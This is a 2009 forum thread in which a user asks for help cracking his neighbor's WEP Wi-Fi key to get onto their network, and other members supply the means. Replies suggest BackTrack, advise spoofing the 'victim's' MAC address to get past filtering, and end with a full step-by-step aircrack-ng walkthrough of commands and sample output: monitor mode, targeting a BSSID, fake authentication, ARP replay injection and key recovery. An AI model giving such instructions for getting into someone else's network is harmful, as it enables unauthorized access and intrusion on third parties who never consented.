Trying to crack my neighbors WEP

Wadernater2
n00b
Posts: 3
Joined: Sat Jun 13, 2009 7:54 pm

Trying to crack my neighbors WEP

Post by Wadernater2 » Sat Jun 13, 2009 8:21 pm

Hey, I have been looking at this site and it shows me how to crack a WEP code. I'll show the link a little later, but I have to download a couple of programs and downgrade the driver for the built-in wireless adapter. It is an Intel Pro 3945ABG and the driver needs to support monitor mode. But the thing is, if I crack the code, I will need the IP address ranges, subnet mask (which I don't think changes), default gateway, DNS server, and WINS server. And I was wondering if the way the guy does it on this site http://forum.aircrack-ng.org/index.php?topic=1937 will be able to provide me with this information. As of right now, I don't know why it does this, but on the wireless connection it says that the key is automatically provided for me, and when I connect it says limited or no connectivity. It didn't assign a network address. I was also wondering if it's because the passcode, or key, is wrong. But I think DHCP isn't enabled, so I have to do it automatically. Sorry, I'm a newbie at this stuff, but I'll try and provide you with some information:
The router is obviously a Linksys, as their network is named linksys.
On the laptop I have Windows XP Media Center Edition.
The wireless card is an Intel Pro 3945ABG.

Also, I read a little about a program called Kismet. I didn't know if it is good with Windows and my wireless card. But please help, because on Monday I'm going to try what this other guy did and capture packets and shit, but if I don't get IP addresses and stuff I don't think it'll help.
Thanks

narada
Hacker in Training
Posts: 92
Joined: Sat Apr 25, 2009 10:05 am

Re: Trying to crack my neighbors WEP

Post by narada » Sun Jun 14, 2009 8:55 am

You're probably associated with the router but not authenticated. If it's running DHCP you shouldn't need to set any static information as it will be provided for you.

Kismet is a nice little utility but I don't know if there's a Windows version. I think you'd have an easier time simply downloading BackTrack (a security audit/pen-testing Linux distro), burning the iso to a disc, and following the tutorial here.

Wadernater2
n00b
Posts: 3
Joined: Sat Jun 13, 2009 7:54 pm

Re: Trying to crack my neighbors WEP

Post by Wadernater2 » Sun Jun 14, 2009 9:28 am

But I don't think the Intel Pro 3945ABG wireless card is compatible with BackTrack.
But I wouldn't mind booting up the computer with Linux and using a program good with Linux to crack it if someone could help me, because I don't know if the software will show the IP address and all the other shit. I don't think I have any problems with getting the WEP key, but I think I need to manually configure IP and stuff, and I need to figure out what my neighbor's IP and other info is so I can get on the network.

stasik
Guru
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Re: Trying to crack my neighbors WEP

Post by stasik » Sun Jun 14, 2009 11:33 am

First check if your card is compatible with BackTrack from the BackTrack wiki page [ http://backtrack.offensive-security.com ... L:Wireless ]. If it is compatible, you'll be able to do ARP injection (need about 20 min to crack the WEP). If you can't do ARP injection, you'll need a longer time to collect enough IVs in order to crack the key (~ 30.000 - 50.000), depending on the victim's activity on the internet. Worst case scenario, you'll need about 2-3 days. I don't think you need to configure IP, because the router assigns IPs to the devices (192.168.100, 192.168.101, etc). First get the key and see if you could connect to the internet. If there is a MAC filter on the router, you'll need to fake your MAC to the victim's one (the software to fake/change MAC is present in BackTrack).
There are a lot of tutorials on WEP cracking...

fperfect
n00b
Posts: 1
Joined: Thu Jul 09, 2009 9:45 am

Re: Trying to crack my neighbors WEP

Post by fperfect » Thu Jul 09, 2009 9:51 am

Try with backtrack 4 pre, it might help - here is a short article on how to use it http://www.think-security.com/wireless-wep-insecurity/

Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Trying to crack my neighbors WEP

Post by Thor » Fri Jul 17, 2009 12:09 am

The ath5k driver injects without patches and works with one of my Atheros cards. Someone mentioned using backtrack, the backtrack 4 beta version works with all 3 of my cards by default.

infin8ty
n00b
Posts: 1
Joined: Sun Sep 13, 2009 2:33 am

Re: Trying to crack my neighbors WEP

Post by infin8ty » Sun Sep 13, 2009 2:47 am

Yeah, atheros chip seems best but you could always get wireless USB adapter like Hawkins which injects for me.
Or you could boot up Backtrack from a USB and use Spoonwep [automated wep cracking].

$k£tch
n00b
Posts: 10
Joined: Wed Sep 16, 2009 12:26 am
Location: UK

Re: Trying to crack my neighbors WEP

Post by $k£tch » Wed Sep 16, 2009 1:24 am

The easiest way is if you're willing to give Linux a go. If so, here's step by step what to do:
Boot up into the distro of Linux that you have chosen. As you've got the same wireless card as me, I'll show you the way via Ubuntu (probably best for being user friendly). You can get it from http://www.ubuntu.com/getubuntu/download and once you've downloaded it, just burn it to a CD/DVD or even a USB; I found it easiest on a USB :)
Once this is done, boot up and open up a terminal (basically it's a Linux version of the Windows command prompt). There should be an icon looking like a black tinted window in the top right hand of the screen. Once this is open, type in:

sudo apt-get install aircrack-ng

This will download and install aircrack, and it also comes with the correct driver that you need for the wireless card.
When this has finished installing, it's on to the actual crack :P

in a terminal type:
sudo airmon-ng start wlan0 (sets wireless card to monitor mode)

When you type this in, it will ask you for your password. You have to remember that for security reasons Linux doesn't even show asterisks, so it will look like you are typing nothing. Once this is done, you should get an outcome like this:

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3091 NetworkManager
3109 wpa_supplicant
3115 avahi-daemon
3116 avahi-daemon


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)


If this is pretty much what you got, then proceed on. Next we need to find the BSSID address of the target's router.
To get a list of all the wireless networks in your range and also to display their wireless security such as WEP, WPA, etc., type in:

sudo airodump-ng mon0

Once this is working, you'll need to write down the channel that the wireless network is running on and also their BSSID. After you've recorded the info, press Ctrl and C at the same time to stop the process so that you can move on to the next step.

Next you need to associate your wireless card to the network. This is done by:

sudo airodump-ng -w wep -c 1 --bssid 00:11:22:33:44:55 mon0

The -w is the file you want to write the packets to; you can call this whatever you want. I've used the word wep due to it being small and easy to remember. The -c is the channel that your target is on and the --bssid is obviously their BSSID that you recorded earlier. Once this is done, it should only be focused on the target's network.

Next, gathering up packets :D
Open a new terminal and type:

sudo aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0

You should get a result like this:

No source MAC (-h) specified. Using the device MAC (45:23:DE:ST:H3:51)
12:06:25 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 11

12:06:25 Sending Authentication Request (Open System) [ACK]
12:06:25 Authentication successful
12:06:25 Sending Association Request [ACK]
12:06:25 Association successful :-) (AID: 1)


If you got this, then move on. If not, it may mean you need to get closer to the network, or they may be using MAC address filtering. If so, you will need to fake your MAC address to one that is already on the network. If you need to do this, just shout up and I'll go through it :)

The next step is to speed up getting the packets, as otherwise it could really take days haha

sudo aireplay-ng -3 -b 00:11:22:33:44:55 mon0

After a few minutes this will start to gather packets from the network, and how fast you get them will depend on what they are doing on the Internet. In my experience you will need about 30,000, but it varies on how big the key is that you're cracking. You will be able to see how many packets you have gathered if you go back to the first terminal; under the heading #data is the amount you've got.

Once you have got the amount of packets needed, open up a new terminal and type:

dir

This will give you a list of files that are on your computer. You will need the one that you named earlier; it will end in -01.cap, so mine is wep-01.cap

Once you've found this file, copy the name and type in:

sudo aircrack-ng wep-01.cap

This will start processing the packets and finding out the key for you :P If you had enough packets, then it will decrypt the key successfully :D Just make a note of the key and boot back into your Windows partition, scan for networks and type it in for the password, although you will need to remove the : from the key before you type it in.

Hope this helped, buzz me if you get stuck :P
